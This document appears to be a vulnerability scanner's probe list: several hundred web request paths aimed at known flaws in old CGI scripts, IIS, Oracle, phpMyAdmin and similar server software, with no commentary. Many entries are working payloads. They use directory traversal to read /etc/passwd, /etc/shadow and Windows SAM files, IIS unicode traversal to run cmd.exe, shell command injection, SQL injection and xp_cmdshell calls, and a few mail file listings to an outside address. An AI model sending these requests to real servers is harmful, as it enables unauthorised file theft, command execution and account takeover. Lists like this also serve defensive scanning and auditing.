:8080/web-console/ServerInfo.jsp%00
//admin//user.pl
:8080//admin//user.pl
/web-console/ServerInfo.jsp%00
:8080/web-console/
/web-console/
/cgi-bin/auto_ftp.pl
/auto_ftp.pl
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/formhandler/formhandler.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/cgitest.exe
/cgi-bin/cgitest.htm
/cgi-bin/cgitest.pl
/cgi-bin/cgitest.sh
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/view_all_bug_page.php
/bugs/view_all_bug_page.php
/bugtrack/view_all_bug_page.php
/mantis/view_all_bug_page.php
/mantis/login_page.php?g_****_include_file=every_file
/bugs/login_page.php?g_****_include_file=every_file
/bug/login_page.php?g_****_include_file=every_file
/bugtrack/login_page.php?g_****_include_file=every_file
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/webwho.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/FormMail.cgi
/cgi-bin/formmail.cgi
/cgi-bin/formmail.asp
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/cgi-bin/chformmail.pl
/cgi-bin/formmailET.pl
/cgi-bin/download.cgi?s=path&c=txt&f=fn
/cgi-bin/download.pl?s=path&c=txt&f=fn
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/msadc/samples/adctest.exe
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B %28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/cgi-bin/plusmail
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/iishelp/iis/misc/iirturnh.htw
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/WS_FTP.LOG
/log/WS_FTP.LOG
/logs/WS_FTP.LOG
/cgi-bin/Ultimate.cgi
/cgi-bin/dcboard.cgi
/cgi-bin/forums/dcboard.cgi
/cgi-bin/dcforum/dcboard.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/ubb/register.php
/cgi-bin/postings.cgi
/cgi-bin/core
/.HTACCESS.
/%2esharelock
/%2eHTACCESS
/%2ehtaccess
/%2ehtpasswd
/cgi-bin/echo
/cgi-bin/echo2
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch.cgi?exclude=%60%60
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/loadpage.cgi
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/postcard.pl
/cgi-bin/.fhp
/cgi-bin/clickresponder.pl
/cgi-bin/responder.cgi
/cgi-win/uploader.exe
/upload/uploader.php
/upload/upload.php
/uploader.php
/upload.php
/cgi-bin/uploadn.asp
/cgi-bin/upload.asp
/cgi-bin/excite
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/ping
/jsp/source.jsp
/jsp/upload.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/ccbill/whereami.cgi?g=cat+../../../../etc/hosts
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/dcforum/install_help.cgi
/cgi-bin/dcforum/dcforum.cgi?az=list&file=filename%00
/cgi-bin/dcforum.cgi?az=list&file=filename%00
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/c32web.exe/ChangeAdminPassword
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.pl
/cgi-bin/allmanage.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/ads.cgi
/cgi-bin/admin.cgi
/ads/admin.cgi
/cgi-bin/adpassword.txt
/cgi-bin/ads/adpassword.txt
/cgi-bin/banner/adpassword.txt
/cgi-bin/banner/data/adpassword.txt
/password.inc
/password.txt
/password.db
/password.dat
/ads/adpassword.txt
/banner/adpassword.txt
/banner/dat/adpassword.txt
/banner/data/adpassword.txt
/webres/discuss/passwd.txt
/discuss/passwd.txt
/files/passwd.txt
/admin/admin.php
/guestbook/admin.php
/guestbook/files/passwd.txt
/gaestebuch/files/passwd.txt
/cgi-bin/infosrch.cgi
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
/source.jsp
:8987/sawmill?rfcf+“/etc/passwd“+spbn+1*1*21*1*1*1*1*1*1*1*1*1+3
/cgi-bin/sawmill5?rfcf+“/etc/passwd“+spbn+1*1*21*1*1*1*1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/db/info.php
/poll/db/info.php
/poll/textfile/info.php
/PSUser/PSCOErrPage.htm?errPagePath=/etc/hosts
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/. color=#22229cwww.my.cnf
/globals.pl
/cgi-bin/. color=#22229cwww.my.cnf
/cgi-bin/futureforum.cgi
/cgi-bin/futureforum3.cgi
/forum/index.php?act=Search&nav=lv&CODE=show&searchid=valid_session_id&search_in=topics&result_type=topics&hl=&st=20_sql_things/*
/examples/applications/bboard/bboard_frames.html
/level/99/exec/show/config
/level/15/exec/show/config
/level/1/exec/show/config
/level/0/exec/show/config
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cwmail.ini
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
/examples/servlet/SnoopServlet
/servlet/FileDistributionServlet
/servlets/weblogic.management.servlet.FileDistributionServle t
:2602
:8080/examples/servlet/SnoopServlet
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
:8080/%2e%2e/%2e%2e/%00.jsp
/.%2e/.%2e/.%2e/winnt/repair/sam._
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/[email protected]&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/[email protected]&FileName=mailfile:c&Subject=tst&[email protected]
/cgi-bin/mailfile.cgi?real_name=rc&[email protected]&filename=mailfile.cgi
/cgi-bin/[email protected]&[email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi?_browser_out=|/bin/ls|
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/..../
/~nobOdy/etc/
:3000/../../hosts
:444/..\..\..\..\..\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
/dbconfig.inc
/config.inc
/cfg.inc
/include/config.inc
/inc/db.inc
/inc/odbc.inc
/db.inc
/dba.inc
/data.inc
/odbc.inc
/config.inc
/global.inc
/./../main.conf
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php?op=login&pwd=123&aid=Admin’sqlthings
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/servlets/com.sun.server.http.pagecompile.jsp92.JspServlet
/servlets/com.sun.server.http.pagecompile.jsp.runtime.JspSer vlet
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe?%24Attach%24=file.txt&%24To%[email protected]
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru(’/bin/ls’)."
/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru(’/bin/ls’)."
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/asp/db/message.mdb
/db/message.mdb
/asp/mail/message.mdb
/mail/message.mdb
/mails/message.mdb
/webmail/message.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/scripts/websec.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/info.php
/info.php3
/phpinfo.php
/phpinfo.php3
/php/info.php
/php/info.php3
/php/phpinfo.php
/php/phpinfo.php3
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/ssifilter/../../test.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/jsp/../../tst.txt
//WEB-INF/
//WEB-INF/web.xml
//WEB-INF/webapp.properties
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/default.php%20%20
/default.php3%20%20
/index.php3%20%20
/index.php%20%20
/index.php3?vhosts=http://go.to
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/db2_doc/html/db2srsen.exe
/+/
/+./
/++/
/++./
/includes/config.inc
/includes/config.php
/includes/config.php3
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdol.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdod.pl
/cgi-bin/mmstdol.pl
/mmstdod.cgi
/mmstdod.pl
/mmstdol.cgi
/mmstdol.pl
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&[email protected];ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&[email protected]
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&[email protected]
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/cgi-bin/guestbook.pl
/cgi-bin/guestbook.data
/cgi-bin/guestbook.config
/cgi-bin/guestbook.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/passcfg
/passcfg
/pls/orasso/orasso.wwsso_app_admin.ls_login
/pls/orasso/
/pls/admin_/?
/pls/admin_/help/..%5Cplsql.conf
/pls/demo/owa_util.signature
/pls/demo/%20owa_util.signature
/pls/demo/%0aowa_util.signature
/pls/demo/%08owa_util.signature
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/Globals.jsa
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_users
/soap/servlet/soaprouter
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/dms0
/dms/DMSDump
/servlet/DMSDump
/servlet/Spy
/soap/servlet/Spy
/dms/AggreSpy
/oprocmgr-status
/oprocmgr-service
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/fcgi-bin/echo
/fcgi-bin/echo2
/WebDB/admin_/
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/servlet/FormMailServlet?juhu.txt
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/WebPopServlet?config=uii.txt
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/webdriver
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/gettext.pl
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/ping.cgi
/cgi-bin/traceroute.cgi
/cgi-bin/finger.cgi
/cgi-bin/whois.cgi
/.nsf/../winnt/win.ini
/.box/../winnt/win.ini
/.ns4/../winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/%00.nsf/../lotus/domino/notes.ini
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/cgi-bin/debug.pl
/cgi-bin/debug.cgi
/mysql.class
/class/mysql.class
/inc/sendmail.inc
/cgi-bin/statsconfig.pl
/cgi-bin/stats.pl
/deletecontact.php?item_id=100+OR+TRUE+;
/cgi-bin/pi?page=document/show_file&id=
/./WEB-INF/
/./WEB-INF/web.xml
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/user_info.php3?user_username=’’+or+admin_level=2+o r+username%3d’x’+and+users.id=access.user_id;%00
/cgi-bin/user_info.php3?user_username=’’+or+admin_level=2+o r+username%3d’x’+and+users.id=access.user_id;%00
/guestserver/guestserver.cgi?email=|ls|[email protected]
/cgi-bin/guestserver.cgi?email=|ls|[email protected]
/cfbin/board.cgi
/cgi-bin/board.cgi
/cgi-bin/getcomments.pl
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/opendir.php?requesturl=/etc/hosts
/ROADS/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/empower?DB=mungowitsch
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/way-board/way-board.cgi?db=way-board.cgi%00
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/upload.html
/cgi/bin/test.txt;%20/bin/ls
/cgi-bin/test.txt;%20/bin/ls
/isapi/tstisapi.dll
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/adcycle/adcenter.cgi
/ext.dll
/cgi-bin/mailnews.cgi
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/foldoc/template.cgi?template.cgi
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard.cgi
/cgi-bin/post-query?
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/index.js%70
/index.js%70
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/jsp_test/PoolMan.jsp
/PoolMan.jsp
:8080/.jsp/WEB-INF/classes/Env.java
/.jsp/WEB-INF/classes/Env.java
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/nph-maillist.pl
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/cgi-bin/processit.pl
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
:6346/........../windows/win.ini
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/../scandisk.log
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/pass?loginpass=a&redirect=0%2F&Submit=Login
/.../.../scandisk.log
/..../scandisk.log
/chip.ini
/ChipCfg.cfg
/ChipCfg
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
:9090//etc/shadow
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/interscan/cgi-bin/FtpSave.dll?I’m%20here
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/admin/?op=%c0
:631/admin/?op=%c0
/cgi-bin/ws_mail.cgi?kill=ng
:8000/file/%2E%2E/test1.mp3
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/vpopmail.php
/mail/vpopmail.php
/webmail/vpopmail.php
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
:30001/../../template/shared/indexTemplate.xml
/../../template/shared/indexTemplate.xml
/servlet/com.unify.ewave.servletexec.UploadServlet
/imp/compose.php
/compose.php
/AdLogin.pm
/adcycle/AdLogin.pm
/cgi-bin/story.cgi?next=
/webmacro/Page?db=tst&wmtemplate=ttt
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/mailman/edithtml
/cgi-bin/uncgi
/sbin/nscgi.cfg
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/session/pagecount?page=
:8080/../ssd.ini
/scripts/wsendmail.exe
/cgi-bin/wsendmail.exe
/scripts/toos/mkilog.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/phpBBfolder/prefs.php?save=1&viewemail=1’*user_level%3D’4’%20where%20username%3 D’hoschi’%23
/phpBB/bb_memberlist.php?sortby=user_regdate
/cgi-bin/mail.cgi
/scripts/mail.cgi
/cgi-bin/mailform.exe
/scripts/mailform.exe
/cgi-bin/mailsend.exe
/scripts/mailsend.exe
/cgi-bin/mailme.exe
/scripts/mailme.exe
/cgi-bin/mailmepro.exe
/scripts/mailmepro.exe
/cgi-bin/MailPost.exe
/scripts/MailPost.exe
